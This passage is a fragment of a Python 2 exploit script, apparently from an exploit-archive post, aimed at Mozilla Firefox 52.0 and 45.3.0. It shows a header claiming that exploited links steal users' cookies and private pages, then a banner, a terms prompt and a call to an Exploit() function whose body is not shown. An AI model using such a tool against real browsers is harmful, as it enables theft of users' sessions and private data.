Firefox v52.0(Release Date:March 7, 2017),Mozilla Firefox 45.3.0,Mozilla Firefox 45.3.0|Windows 7 32bit_Mozilla Firefox 45 # Software Link : https://www.mozilla.org/en-US/firefox/products/ # Version : Mozilla Firefox v52.0(Release Date:March 7, 2017),Mozilla Firefox 45.3.0 and probably others # CVE : N/A ###################### Mozilla Firefox is vulnerable.Exploited links can steal sensitive informations of users such as cookies or pages like private message pages. ###################### # discovered by : Rusputin ###################### """ print ColourMe(banner, 'blue'),info,ColourMe(terms, 'yellow') agree = raw_input(ColourMe("Do you accept this?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white")) while(agree!="y"): if agree=="n": print ColourMe("Sorry.You can't use this exploit.\n"+sadman,"red") exit() else: agree = raw_input(ColourMe("Do you accept this?(","white")+ColourMe("y","green")+ColourMe("/","white")+ColourMe("n","red")+ColourMe("):","white")) print ColourMe("\n\n"+happyman2+"\n\n","green") Exploit()

